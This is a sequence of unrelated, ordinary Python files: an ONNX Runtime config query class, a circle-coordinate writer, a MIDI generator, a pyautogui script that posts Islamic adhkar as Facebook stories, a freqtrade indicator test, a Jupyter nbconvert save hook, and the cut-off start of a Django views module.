""" def __init__(self, framework_specific_info): self.query_handler = ONNXRTQuery(local_config_file=os.path.join( os.path.dirname(__file__), "onnxrt_integer.yaml")) self.backend = "integerops" super().__init__(framework_specific_info) class ONNXRTQuery(QueryBackendCapability): def __init__(self, local_config_file=None): super().__init__() self.version = ort.__version__ self.cfg = local_config_file self.cur_config = None self._one_shot_query() def _one_shot_query(self): with open(self.cfg) as f: content = yaml.safe_load(f) try: self.cur_config = self._get_specified_version_cfg(content) except Exception as e: # pragma: no cover logger.info("Fail to parse {} due to {}.".format(self.cfg, str(e))) self.cur_config = None raise ValueError("Please check if the format of {} follows Neural Compressor yaml schema.". format(self.cfg)) def _get_specified_version_cfg(self, data): """Get the configuration for the current runtime. If there's no matched configuration in the input yaml, we'll use the `default` field of yaml. Args: data (Yaml content): input yaml file. Returns: [dictionary]: the content for specific version. """ default_config = None for sub_data in data: if sub_data['version']['name'] == self.version: return sub_data if sub_data['version']['name'] == 'default': default_config = sub_data return default_config def get_version(self): # pragma: no cover """Get the current backend version infomation. Returns: [string]: version string. """ return self.cur_config['version']['name'] def get_precisions(self): # pragma: no cover """Get supported precisions for current backend. Returns: [string list]: the precisions' name. """ return self.cur_config['precisions']['names'] def get_op_types(self): # pragma: no cover """Get the supported op types by all precisions. Returns: [dictionary list]: A list composed of dictionary which key is precision and value is the op types. """ return self.cur_config['ops'] def get_quantization_capability(self): """Get the supported op types' quantization capability. Returns: [dictionary list]: A list composed of dictionary which key is precision and value is a dict that describes all op types' quantization capability. """ return self.cur_config['capabilities'] def get_op_types_by_precision(self, precision): """Get op types per precision Args: precision (string): precision name Returns: [string list]: A list composed of op type. """ assert precision in list(self.cur_config['ops'].keys()) return self.cur_config['ops'][precision] def get_graph_optimization(self): """ Get onnxruntime graph optimization level""" optimization_levels = {'DISABLE_ALL': ort.GraphOptimizationLevel.ORT_DISABLE_ALL, 'ENABLE_BASIC': ort.GraphOptimizationLevel.ORT_ENABLE_BASIC, 'ENABLE_EXTENDED': ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED, 'ENABLE_ALL': ort.GraphOptimizationLevel.ORT_ENABLE_ALL} level = self.cur_config['graph_optimization']['level'] assert level in optimization_levels, "the optimization choices \ are {}".format(optimization_levels.keys()) return optimization_levels[level]
nilq/baby-python
python
# Write the coordinates of the circles that need to be segmented to a file
class SegmentInfoWriter(object):
    def __init__(self, file):
        self.file = file

    def setSegmentInfo(self, all_circles, needSegment_idx):
        self.all_circles = all_circles
        self.needSegment_idx = needSegment_idx
        self.__write()

    def __write(self):
        num = len(self.needSegment_idx)
        with open(self.file, 'w') as f:
            # First line: the number of circles; then one "idx,x,y,r" line per circle
            f.write(str(num) + '\n')
            for idx in self.needSegment_idx:
                px = int(self.all_circles[idx][0][0])
                py = int(self.all_circles[idx][0][1])
                pr = int(self.all_circles[idx][1])
                line = str(idx) + ',' + str(px) + ',' + str(py) + ',' + str(pr) + '\n'
                f.write(line)
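# --- Usage sketch (not part of the original module) ---
# The indexing above implies each circle is ((center_x, center_y), radius);
# the values and output file name below are illustrative.
if __name__ == "__main__":
    circles = [((10.5, 20.5), 5.0), ((30.0, 40.0), 7.5), ((50.0, 60.0), 9.0)]
    writer = SegmentInfoWriter("segments.txt")
    writer.setSegmentInfo(circles, needSegment_idx=[0, 2])
    # segments.txt now contains:
    # 2
    # 0,10,20,5
    # 2,50,60,9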
nilq/baby-python
python
from midiutil import MIDIFile

bpm = 60
vartrack = 2
# Each list: the initial start time, then (note, duration, instrument) tuples;
# an optional trailing integer is the number of times the sequence is played.
toadd = [1, (60, 1, 2), (62, 1, 25), (64, 1, 64), (65, 1, 53), (67, 1, 32), (69, 1, 14), (71, 1, 87), (72, 1, 69), 2]
toadd1 = [1, (60, 1, 5), (62, 1, 55), (64, 1, 31), (65, 1, 45), (67, 1, 115), (69, 1, 54), (71, 1, 87), (72, 1, 69), 2]

midi = MIDIFile(vartrack)  # takes the number of tracks as a parameter
midi.addTempo(0, 0, bpm)

time = toadd[0]  # initial silence is the first parameter; for additional silence pass the note 0
temp = 1
currtrack = 0  # MIDIFile tracks are 0-indexed, so the first list goes to track 0


def addnotes(toadd):
    global temp
    global time
    global currtrack
    if toadd[0] < 0:
        raise ValueError("Start time should be positive")
    notes = toadd[1:]
    # If the last element is an integer, it is the repeat count: the sequence
    # is played that many times in total (an interpretation of the original,
    # broken, extend-based repeat logic)
    if isinstance(notes[-1], int):
        notes = notes[:-1] * notes[-1]
    for entry in notes:
        note = entry[0]      # pitch
        duration = entry[1]  # duration of the note
        if len(entry) > 2:   # optional instrument change
            instrument = entry[2]
            if instrument != temp:
                midi.addProgramChange(currtrack, 0, time, instrument)  # switch the current instrument
                temp = instrument
                print("changed instrument")
        else:
            instrument = temp  # keep the previous instrument, defaults to Acoustic Grand Piano
        print(note, duration, instrument)
        midi.addNote(currtrack, 0, note, time, duration, 100)  # add the actual note
        time += duration  # the next note starts where the previous one ended
        print(time)
    currtrack += 1  # the next list is written to the next track


addnotes(toadd)
addnotes(toadd1)
with open("test.mid", 'wb') as file:  # write the binary file
    midi.writeFile(file)
    print("written")
nilq/baby-python
python
import time import datetime import webbrowser import pyperclip import pyautogui AzkharAlsabah = [ "اللَّهُمَّ أنْتَ رَبِّي لا إلَهَ إلَّا أنْتَ، خَلَقْتَنِي وأنا عَبْدُكَ، وأنا علَى عَهْدِكَ ووَعْدِكَ ما اسْتَطَعْتُ، أعُوذُ بكَ مِن شَرِّ ما صَنَعْتُ، أبُوءُ لكَ بنِعْمَتِكَ عَلَيَّ، وأَبُوءُ لكَ بذَنْبِي فاغْفِرْ لِي، فإنَّه لا يَغْفِرُ الذُّنُوبَ إلَّا أنْت", 'أَصبَحْنا على فِطرةِ الإسلامِ، وعلى كَلِمةِ الإخلاصِ، وعلى دِينِ نَبيِّنا محمَّدٍ صلَّى اللهُ عليه وسلَّمَ، وعلى مِلَّةِ أبِينا إبراهيمَ، حَنيفًا مُسلِمًا، وما كان مِنَ المُشرِكينَ', 'سبحانَ اللَّهِ وبحمدِه لا قوَّةَ إلَّا باللَّهِ ما شاءَ اللَّهُ كانَ وما لم يشأ لم يَكن أعلمُ أنَّ اللَّهَ على كلِّ شيءٍ قديرٌ وأنَّ اللَّهَ قد أحاطَ بِكلِّ شيءٍ علمًا', 'قال رسول الله صلى الله عليه وسلم: (مَن قال: بسمِ اللهِ الذي لا يَضرُ مع اسمِه شيءٌ في الأرضِ ولا في السماءِ وهو السميعُ العليمِ، ثلاثُ مراتٍ، لم تصبْه فجأةُ بلاءٍ حتى يُصبحَ)', 'قال رسول الله صلى الله عليه وسلم: (مَن قالَ حينَ يصبحُ وحينَ يُمسي: سبحانَ اللَّهِ وبحمدِهِ مائةَ مرَّةٍ: لم يأتِ أحدٌ يومَ القيامةِ بأفضلَ ممَّا جاءَ بِهِ، إلَّا أحدٌ قالَ مثلَ ما قالَ، أو زادَ علَيهِ)', 'اللهمَّ إني أسألُك العفوَ والعافيةَ، في الدنيا والآخرةِ، اللهمَّ إني أسألُك العفوَ والعافيةَ، في دِيني ودنيايَ وأهلي ومالي، اللهمَّ استُرْ عوراتي، وآمِنْ روعاتي، واحفظني من بين يدي، ومن خلفي، وعن يميني، وعن شمالي، ومن فوقي، وأعوذُ بك أن أُغْتَالَ من تحتي', 'للَّهمَّ بِكَ أصبَحنا، وبِكَ أمسَينا، وبِكَ نحيا وبِكَ نموتُ وإليكَ المصيرُ', 'اللهمَّ إنِّي أعوذُ بك من الهمِّ والحزنِ، والعجزِ والكسلِ، والبُخلِ والجُبنِ، وضَلَعِ الدَّينِ، وغَلَبَةِ الرجالِ', 'اللَّهمَّ إنِّي أسألُكَ خيرَ هذا اليومِ فتحَه، ونصرَه، ونورَه، وبرَكتَه، وَهدايتَهُ، وأعوذُ بِكَ من شرِّ ما فيهِ وشرِّ ما بعدَه', 'اللَّهُمَّ إنِّي أسألُكَ العافيةَ في الدُّنيا والآخِرةِ، اللَّهُمَّ إنِّي أسألُكَ العَفوَ والعافيةَ في دِيني ودُنيايَ، وأهْلي ومالي، اللَّهُمَّ استُرْ عَوْراتي، وآمِنْ رَوْعاتي، اللَّهُمَّ احْفَظْني من بينِ يَدَيَّ، ومن خَلْفي، وعن يَميني، وعن شِمالي، ومن فَوْقي، وأعوذُ بعَظَمتِكَ أنْ أُغْتالَ من تَحْتي', 'اللهم إنا نعوذُ بك من أن نُشرِكَ بك شيئًا نعلَمُه، و نستغفرُك لما لا نعلمُه', 'يا حيُّ يا قيُّومُ، برَحمتِكَ أستَغيثُ، أصلِح لي شأني كُلَّهُ، ولا تَكِلني إلى نَفسي طرفةَ عينٍ', 'اللَّهمَّ ما أصبحَ بي من نعمةٍ أو بأحدٍ من خلقِكَ فمنكَ وحدَكَ لا شريكَ لكَ فلكَ الحمدُ ولكَ الشُّكرُ', 'اللَّهمَّ عالِمَ الغَيبِ والشَّهادةِ، فاطرَ السَّمواتِ والأرضِ، رَبَّ كلِّ شيءٍ ومَليكَهُ، أشهدُ أن لا إلَهَ إلَّا أنتَ، أعوذُ بِكَ مِن شرِّ نفسي وشرِّ الشَّيطانِ وشِركِهِ', '(حَسبيَ اللهُ لا إلهَ إلَّا هو، عليه تَوكَّلْتُ، وهو ربُّ العَرشِ العَظيمِ)، سَبعَ مراتٍ', '(سُبْحَانَ اللهِ وَبِحَمْدِهِ، عَدَدَ خَلْقِهِ وَرِضَا نَفْسِهِ وَزِنَةَ عَرْشِهِ وَمِدَادَ كَلِمَاتِهِ)، وهي تُقال ثلاث مرات', 'سبحانَ اللَّهِ وبحمدِهِ وهي تُقال مئةَ مرَّةٍ', 'اللَّهُمَّ إنِّي أصبَحتُ أُشهِدُك، وأُشهِدُ حَمَلةَ عَرشِكَ، ومَلائِكَتَك، وجميعَ خَلقِكَ: أنَّكَ أنتَ اللهُ لا إلهَ إلَّا أنتَ، وأنَّ مُحمَّدًا عبدُكَ ورسولُكَ', 'رَضيتُ باللَّهِ ربًّا، وبالإسلامِ دينًا، وبِمُحمَّدٍ رسولًا', 'اللَّهمَّ عافِني في بدَني اللَّهمَّ عافِني في سمعي اللَّهمَّ عافِني في بصري لا إلهَ إلَّا أنت. اللَّهمَّ إنِّي أعوذُ بِكَ منَ الكُفْرِ والفقرِ اللَّهمَّ إنِّي أعوذُ بكَ من عذابِ القبرِ لا إلهَ إلَّا أنت تعيدُها ثَلاثَ مرَّاتٍ', 'أَصْبَحْنَا وَأَصْبَحَ المُلْكُ لِلَّهِ وَالْحَمْدُ لِلَّهِ لا إلَهَ إلَّا اللَّهُ، وَحْدَهُ لا شَرِيكَ له . 
له المُلْكُ وَلَهُ الحَمْدُ وَهو علَى كُلِّ شيءٍ قَدِيرٌ، رَبِّ أَسْأَلُكَ خَيْرَ ما في هذِه اللَّيْلَةِ وَخَيْرَ ما بَعْدَهَا، وَأَعُوذُ بكَ مِن شَرِّ ما في هذِه اللَّيْلَةِ وَشَرِّ ما بَعْدَهَا، رَبِّ أَعُوذُ بكَ مِنَ الكَسَلِ وَسُوءِ الكِبَرِ، رَبِّ أَعُوذُ بكَ مِن عَذَابٍ في النَّارِ وَعَذَابٍ في القَبْرِ', 'اللَّهُمَّ صَلِّ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا صَلَّيْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ، اللَّهُمَّ بَارِكْ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا بَارَكْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ (مَن صلى عَلَيَّ حين يُصْبِحُ عَشْرًا ، وحين يُمْسِي عَشْرًا أَدْرَكَتْه شفاعتي يومَ القيامةِ)', 'أستغفرُ اللهَ العظيمَ الذي لا إلهَ إلَّا هو الحيَّ القيومَ وأتوبُ إليه', 'اللَّهمَّ إنِّي أسألُكَ عِلمًا نافعًا ورزقًا طيِّبًا وعملًا متقبَّلًا', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'من قال إذا أصبَح: لا إلهَ إلَّا اللهُ وحدَه لا شريكَ له له الملكُ وله الحمدُ وهو على كلِّ شيءٍ قديرٌ عشْرَ مرَّاتٍ كُتِب له بهنَّ عشْرُ حسناتٍ ومُحي بهنَّ عنه عشْرُ سيِّئاتٍ ورُفِع له بهن عشْرُ درجاتٍ وكُنَّ له عَدْلَ عِتاقةِ أربعِ رقابٍ وكُنَّ له حرَسًا مِن الشَّيطانِ حتَّى يُمسيَ', 'آية الكرسي: (اللَّهُ لَا إِلَٰهَ إِلَّا هُوَ الْحَيُّ الْقَيُّومُ ۚ لَا تَأْخُذُهُ سِنَةٌ وَلَا نَوْمٌ ۚ لَّهُ مَا فِي السَّمَاوَاتِ وَمَا فِي الْأَرْضِ ۗ مَن ذَا الَّذِي يَشْفَعُ عِندَهُ إِلَّا بِإِذْنِهِ ۚ يَعْلَمُ مَا بَيْنَ أَيْدِيهِمْ وَمَا خَلْفَهُمْ ۖ وَلَا يُحِيطُونَ بِشَيْءٍ مِّنْ عِلْمِهِ إِلَّا بِمَا شَاءَ ۚ وَسِعَ كُرْسِيُّهُ السَّمَاوَاتِ وَالْأَرْضَ ۖ وَلَا يَئُودُهُ حِفْظُهُمَا ۚ وَهُوَ الْعَلِيُّ الْعَظِيمُ)', "سورة الإخلاص: (قُلْ هُوَ اللَّهُ أَحَدٌ* اللَّهُ الصَّمَدُ* لَمْ يَلِدْ وَلَمْ يُولَدْ* وَلَمْ يَكُن لَّهُ كُفُوًا أَحَدٌ) ثلاثا", 'سورة الفلق: (قُلْ أَعُوذُ بِرَبِّ الْفَلَقِ* مِن شَرِّ مَا خَلَقَ* وَمِن شَرِّ غَاسِقٍ إِذَا وَقَبَ* وَمِن شَرِّ النَّفَّاثَاتِ فِي الْعُقَدِ* وَمِن شَرِّ حَاسِدٍ إِذَا حَسَدَ) ثلاثا', 'سورة الناس: (قُلْ أَعُوذُ بِرَبِّ النَّاسِ* مَلِكِ النَّاسِ* إِلَٰهِ النَّاسِ* مِن شَرِّ الْوَسْوَاسِ الْخَنَّاسِ* الَّذِي يُوَسْوِسُ فِي صُدُورِ النَّاسِ* مِنَ الْجِنَّةِ وَالنَّاسِ) ثلاثا', 'قوله تعالى: (رَبِّ أَعُوذُ بِكَ مِنْ هَمَزَاتِ الشَّيَاطِينِ وَأَعُوذُ بِكَ رَبِّ أَنْ يَحْضُرُونِ)', 'قوله تعالى: (رَبِّ أَعُوذُ بِكَ مِنْ هَمَزَاتِ الشَّيَاطِينِ وَأَعُوذُ بِكَ رَبِّ أَنْ يَحْضُرُونِ)قوله تعالى: (حَسْبِيَ اللَّهُ لَا إِلَٰهَ إِلَّا هُوَ ۖ عَلَيْهِ تَوَكَّلْتُ ۖ وَهُوَ رَبُّ الْعَرْشِ الْعَظِيمِ).' 
] # ======================================================================================================================================================================================================================================================================================================================================================= AzkharAlMasaa = [ 'اللَّهمَّ إنِّي عَبدُك، وابنُ عبدِك، وابنُ أمتِك، ناصِيَتي بيدِكَ، ماضٍ فيَّ حكمُكَ، عدْلٌ فيَّ قضاؤكَ، أسألُكَ بكلِّ اسمٍ هوَ لكَ سمَّيتَ بهِ نفسَك، أو أنزلْتَه في كتابِكَ، أو علَّمتَه أحدًا من خلقِك، أو استأثرتَ بهِ في علمِ الغيبِ عندَك، أن تجعلَ القُرآنَ ربيعَ قلبي، ونورَ صَدري، وجَلاءَ حَزَني، وذَهابَ هَمِّي', 'اللَّهمَّ إنِّي أسأَلُكَ مِن الخيرِ كلِّه عاجلِه وآجلِه ما علِمْتُ منه وما لَمْ أعلَمْ وأعوذُ بكَ مِن الشَّرِّ كلِّه عاجلِه وآجلِه ما علِمْتُ منه وما لَمْ أعلَمْ، اللَّهمَّ إنِّي أسأَلُكَ مِن الخيرِ ما سأَلكَ عبدُك ونَبيُّكَ وأعوذُ بكَ مِن الشَّرِّ ما عاذ به عبدُك ونَبيُّكَ وأسأَلُكَ الجنَّةَ وما قرَّب إليها مِن قولٍ وعمَلٍ وأعوذُ بكَ مِن النَّارِ وما قرَّب إليها مِن قولٍ وعمَلٍ وأسأَلُكَ أنْ تجعَلَ كلَّ قضاءٍ قضَيْتَه لي خيرًا', '(بسمِ اللهِ الذي لا يَضرُ مع اسمِه شيءٌ في الأرضِ ولا في السماءِ وهو السميعُ العليمِ)، وتُقال ثلاث مرات', 'رَضِيتُ بِاللهِ رَبًّا، وَبِالْإِسْلَامِ دِينًا، وَبِمُحَمَّدٍ صَلَّى اللهُ عَلَيْهِ وَسَلَّمَ نَبِيًّا وَرَسُولًا', 'اللَّهمَّ بِكَ أمسَينا وبِكَ أصبَحنا وبِكَ نحيا وبِكَ نموتُ وإليكَ المصير', 'اللَّهمَّ ما أمسى بي مِن نعمةٍ أو بأحَدٍ مِن خَلْقِكَ، فمنكَ وحدَكَ لا شريكَ لكَ، فلَكَ الحمدُ ولكَ الشُّكرُ، فقد أدى شُكْرَ ذلكَ اليومِ', 'سبحانَ اللَّهِ وبحمدِهِ وهي تُقال مئةَ مرَّةٍ', '(سُبْحَانَ اللهِ وَبِحَمْدِهِ، عَدَدَ خَلْقِهِ وَرِضَا نَفْسِهِ وَزِنَةَ عَرْشِهِ وَمِدَادَ كَلِمَاتِهِ)، وهي تُقال ثلاث مرات', 'اللَّهُمَّ إنِّي أمسيت أُشهِدُك، وأُشهِدُ حَمَلةَ عَرشِكَ، ومَلائِكَتَك، وجميعَ خَلقِكَ: أنَّكَ أنتَ اللهُ لا إلهَ إلَّا أنتَ، وأنَّ مُحمَّدًا عبدُكَ ورسولُكَ', 'اللَّهُمَّ صَلِّ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا صَلَّيْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ، اللَّهُمَّ بَارِكْ عَلَى مُحَمَّدٍ وَعَلَى آلِ مُحَمَّدٍ، كَمَا بَارَكْتَ عَلَى إِبْرَاهِيمَ وَعَلَى آلِ إِبْرَاهِيمَ، إِنَّكَ حَمِيدٌ مَجِيدٌ (مَن صلى عَلَيَّ حين يُصْبِحُ عَشْرًا ، وحين يُمْسِي عَشْرًا أَدْرَكَتْه شفاعتي يومَ القيامةِ)', 'لا إلهَ إلَّا اللهُ وحدَه لا شريكَ له له الملكُ وله الحمدُ وهو على كلِّ شيءٍ قديرٌ', 'أمسَيْنا على فِطرةِ الإسلامِ وعلى كَلِمةِ الإخلاصِ وعلى دينِ نبيِّنا محمَّدٍ صلَّى اللهُ عليه وسلَّم وعلى مِلَّةِ أبينا إبراهيمَ حنيفًا مسلمًا وما كان مِنَ المشركينَ', '(اللَّهمَّ عافِني في بدَني اللَّهمَّ عافِني في سمعي اللَّهمَّ عافِني في بصري لا إلهَ إلَّا أنت، اللَّهمَّ إنِّي أعوذُ بِكَ منَ الكُفْرِ والفقرِ اللَّهمَّ إنِّي أعوذُ بكَ من عذابِ القبرِ لا إلهَ إلَّا أنت) وتقال ثَلاثَ مرَّاتٍ', 'اللهم إنا نعوذُ بك من أن نُشرِكَ بك شيئًا نعلَمُه، و نستغفرُك لما لا نعلمُه', 'أستغفرُ اللهَ العظيمَ الذي لا إلهَ إلَّا هو الحيَّ القيومَ وأتوبُ إليه', 'اللَّهمَّ إنِّي أسألُكَ عِلمًا نافعًا ورزقًا طيِّبًا وعملًا متقبَّلًا', 'اللَّهمَّ إنِّي أسألُكَ عِلمًا نافعًا ورزقًا طيِّبًا وعملًا متقبَّلًايا حيُّ يا قيُّومُ، برَحمتِكَ أستَغيثُ، أصلِح لي شأني كُلَّهُ، ولا تَكِلني إلى نَفسي طرفةَ عينٍ', 'اللَّهمَّ عالِمَ الغَيبِ والشَّهادةِ، فاطرَ السَّمواتِ والأرضِ، رَبَّ كلِّ شيءٍ ومَليكَهُ، أشهدُ أن لا إلَهَ إلَّا أنتَ، أعوذُ بِكَ مِن شرِّ نفسي وشرِّ الشَّيطانِ وشِركِهِ', 'اللهمَّ فاطرَ السمواتِ والأرضِ، عالمَ الغيبِ والشهادةِ، لا إلهَ إلَّا أنتَ ربَّ كلِّ شيءٍ ومَليكَه، أعوذُ بك من شرِّ نفسي ومن شرِّ الشيطانِ وشرَكِه، وأنْ أقترفَ على نفسي سوءًا أو أجرَّهُ إلى مسلمٍ', 'اللهمَّ إنِّي 
أعوذُ بك من الهمِّ والحزنِ، والعجزِ والكسلِ، والبُخلِ والجُبنِ، وضَلَعِ الدَّينِ، وغَلَبَةِ الرجالِ', 'أعوذُ بكلماتِ اللهِ التَّامَّاتِ مِن شرِّ ما خلَق', 'اللهمَّ إني أسألُك العفوَ والعافيةَ، في الدنيا والآخرةِ، اللهمَّ إني أسألُك العفوَ والعافيةَ، في دِيني ودنيايَ وأهلي ومالي، اللهمَّ استُرْ عوراتي، وآمِنْ روعاتي، واحفظني من بين يدي، ومن خلفي، وعن يميني، وعن شمالي، ومن فوقي، وأعوذُ بك أن أُغْتَالَ من تحتي', 'أَمْسَيْنَا وَأَمْسَى المُلْكُ لِلَّهِ، وَالْحَمْدُ لِلَّهِ لا إلَهَ إلَّا اللَّهُ، وَحْدَهُ لا شَرِيكَ له، له المُلْكُ وَلَهُ الحَمْدُ وَهو علَى كُلِّ شيءٍ قَدِيرٌ، رَبِّ أَسْأَلُكَ خَيْرَ ما في هذِه اللَّيْلَةِ وَخَيْرَ ما بَعْدَهَا، وَأَعُوذُ بكَ مِن شَرِّ ما في هذِه اللَّيْلَةِ وَشَرِّ ما بَعْدَهَا، رَبِّ أَعُوذُ بكَ مِنَ الكَسَلِ وَسُوءِ الكِبَرِ، رَبِّ أَعُوذُ بكَ مِن عَذَابٍ في النَّارِ وَعَذَابٍ في القَبْرِ', 'اللَّهُمَّ أنْتَ رَبِّي لا إلَهَ إلَّا أنْتَ، خَلَقْتَنِي وأنا عَبْدُكَ، وأنا علَى عَهْدِكَ ووَعْدِكَ ما اسْتَطَعْتُ، أعُوذُ بكَ مِن شَرِّ ما صَنَعْتُ، أبُوءُ لكَ بنِعْمَتِكَ عَلَيَّ، وأَبُوءُ لكَ بذَنْبِي فاغْفِرْ لِي، فإنَّه لا يَغْفِرُ الذُّنُوبَ إلَّا أنْتَ', 'اللَّهمَّ إنِّي أسألُكَ خيرَ هذه الليلة فتحَها، ونصرَها، ونورَها، وبرَكتَها، وَهداها، وأعوذُ بِكَ من شرِّ ما فيها وشرِّ ما بعدَها', 'آية الكرسي: (اللَّهُ لَا إِلَٰهَ إِلَّا هُوَ الْحَيُّ الْقَيُّومُ ۚ لَا تَأْخُذُهُ سِنَةٌ وَلَا نَوْمٌ ۚ لَّهُ مَا فِي السَّمَاوَاتِ وَمَا فِي الْأَرْضِ ۗ مَن ذَا الَّذِي يَشْفَعُ عِندَهُ إِلَّا بِإِذْنِهِ ۚ يَعْلَمُ مَا بَيْنَ أَيْدِيهِمْ وَمَا خَلْفَهُمْ ۖ وَلَا يُحِيطُونَ بِشَيْءٍ مِّنْ عِلْمِهِ إِلَّا بِمَا شَاءَ ۚ وَسِعَ كُرْسِيُّهُ السَّمَاوَاتِ وَالْأَرْضَ ۖ وَلَا يَئُودُهُ حِفْظُهُمَا ۚ وَهُوَ الْعَلِيُّ الْعَظِيمُ)', "قال تعالى في سورة البقرة أيضاً: (آمَنَ الرَّسُولُ بِمَا أُنزِلَ إِلَيْهِ مِن رَّبِّهِ وَالْمُؤْمِنُونَ ۚ كُلٌّ آمَنَ بِاللَّهِ وَمَلَائِكَتِهِ وَكُتُبِهِ وَرُسُلِهِ لَا نُفَرِّقُ بَيْنَ أَحَدٍ مِّن رُّسُلِهِ ۚ وَقَالُوا سَمِعْنَا وَأَطَعْنَا ۖ غُفْرَانَكَ رَبَّنَا وَإِلَيْكَ الْمَصِيرُ*لَا يُكَلِّفُ اللَّهُ نَفْسًا إِلَّا وُسْعَهَا ۚ لَهَا مَا كَسَبَتْ وَعَلَيْهَا مَا اكْتَسَبَتْ ۗ رَبَّنَا لَا تُؤَاخِذْنَا إِن نَّسِينَا أَوْ أَخْطَأْنَا ۚ رَبَّنَا وَلَا تَحْمِلْ عَلَيْنَا إِصْرًا كَمَا حَمَلْتَهُ عَلَى الَّذِينَ مِن قَبْلِنَا ۚ رَبَّنَا وَلَا تُحَمِّلْنَا مَا لَا طَاقَةَ لَنَا بِهِ ۖ وَاعْفُ عَنَّا وَاغْفِرْ لَنَا وَارْحَمْنَا ۚ أَنتَ مَوْلَانَا فَانصُرْنَا عَلَى الْقَوْمِ الْكَافِرِينَ)", "سورة الإخلاص: (قُلْ هُوَ اللَّهُ أَحَدٌ* اللَّهُ الصَّمَدُ* لَمْ يَلِدْ وَلَمْ يُولَدْ* وَلَمْ يَكُن لَّهُ كُفُوًا أَحَدٌ) ثلاثا", 'سورة الفلق: (قُلْ أَعُوذُ بِرَبِّ الْفَلَقِ* مِن شَرِّ مَا خَلَقَ* وَمِن شَرِّ غَاسِقٍ إِذَا وَقَبَ* وَمِن شَرِّ النَّفَّاثَاتِ فِي الْعُقَدِ* وَمِن شَرِّ حَاسِدٍ إِذَا حَسَدَ) ثلاثا', 'سورة الناس: (قُلْ أَعُوذُ بِرَبِّ النَّاسِ* مَلِكِ النَّاسِ* إِلَٰهِ النَّاسِ* مِن شَرِّ الْوَسْوَاسِ الْخَنَّاسِ* الَّذِي يُوَسْوِسُ فِي صُدُورِ النَّاسِ* مِنَ الْجِنَّةِ وَالنَّاسِ) ثلاثا' ] def story(PageName, Text): pyautogui.moveTo(950, 300, duration=1) time.sleep(2) pyautogui.click() pyautogui.moveTo(900, 200, duration=1) time.sleep(2) pyautogui.click() pyautogui.write(PageName) time.sleep(2) pyautogui.moveTo(970, 270, duration=1) time.sleep(6) pyautogui.click() pyautogui.moveTo(1000, 500, duration=1) time.sleep(2) pyautogui.click() pyautogui.moveTo(150, 400, duration=1) time.sleep(2) pyautogui.click() # Store our string to the clipboard pyperclip.copy(Text) # Hotkey the paste command pyautogui.hotkey("ctrl", "v") pyautogui.moveTo(250, 700, duration=1) time.sleep(2) pyautogui.click() x = int(input('Enter the type (0 for test, 1 for AzkharAlsabah, 2 for 
AzkharAlMasaa): ')) if x == 0: webbrowser.open_new('https://business.facebook.com/creatorstudio/home') time.sleep(10) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlsabah Done on {datetime.datetime.now().time()}✔') elif x == 1: webbrowser.open_new('https://business.facebook.com/creatorstudio/home') time.sleep(10) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlsabah Starts') for i in AzkharAlsabah: story('apocryphon', i) time.sleep(2) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlsabah Done on {datetime.datetime.now().time()}✔') elif x == 2: webbrowser.open_new('https://business.facebook.com/creatorstudio/home') time.sleep(10) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlMasaa Starts') for i in AzkharAlMasaa: story('apocryphon', i) time.sleep(2) story('apocryphon', f'{datetime.datetime.now().date()} AzkharAlMasaa Done on {datetime.datetime.now().time()}✔')
nilq/baby-python
python
import numpy as np import pandas as pd import freqtrade.vendor.qtpylib.indicators as qtpylib def test_crossed_numpy_types(): """ This test is only present since this method currently diverges from the qtpylib implementation. And we must ensure to not break this again once we update from the original source. """ series = pd.Series([56, 97, 19, 76, 65, 25, 87, 91, 79, 79]) expected_result = pd.Series([False, True, False, True, False, False, True, False, False, False]) assert qtpylib.crossed_above(series, 60).equals(expected_result) assert qtpylib.crossed_above(series, 60.0).equals(expected_result) assert qtpylib.crossed_above(series, np.int32(60)).equals(expected_result) assert qtpylib.crossed_above(series, np.int64(60)).equals(expected_result) assert qtpylib.crossed_above(series, np.float64(60.0)).equals(expected_result)
nilq/baby-python
python
import os
import subprocess


def export_script_and_view(model, os_path, contents_manager):
    # Post-save hook: every time a notebook is saved, also export it as a
    # Python script and as a static HTML view next to the .ipynb file.
    if model["type"] != "notebook":
        return
    dir_name, file_name = os.path.split(os_path)
    file_base, file_ext = os.path.splitext(file_name)
    # Skip notebooks that have not been given a name yet
    if file_base.startswith("Untitled"):
        return
    export_name = file_base if file_ext == ".ipynb" else file_name
    subprocess.check_call(["jupyter", "nbconvert", "--to", "script", file_name,
                           "--output", export_name + "_script"], cwd=dir_name)
    subprocess.check_call(["jupyter", "nbconvert", "--to", "html", file_name,
                           "--output", export_name + "_view"], cwd=dir_name)


# `c` is the Jupyter config object that is injected when this code lives in
# jupyter_notebook_config.py.
c.FileContentsManager.post_save_hook = export_script_and_view
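# --- Usage note (not part of the original snippet; a hedged illustration) ---
# With this hook installed, saving e.g. analysis.ipynb also produces
# analysis_script.py and analysis_view.html in the same directory (nbconvert
# appends the .py/.html extensions to the --output names above; the notebook
# name is a placeholder).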
nilq/baby-python
python
import os from collections import defaultdict from tempfile import NamedTemporaryFile from django.conf import settings from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin from django.contrib.messages.views import SuccessMessageMixin from django.core.exceptions import PermissionDenied from django.db.models import Count, Prefetch, QuerySet from django.http import HttpResponse, JsonResponse, QueryDict from django.shortcuts import get_object_or_404 from django.template.loader import render_to_string from django.urls import reverse from django.utils.http import urlquote from django.views import generic from django_filters.views import FilterView from lxml import etree from reversion.models import Version from reversion.revisions import add_to_revision, 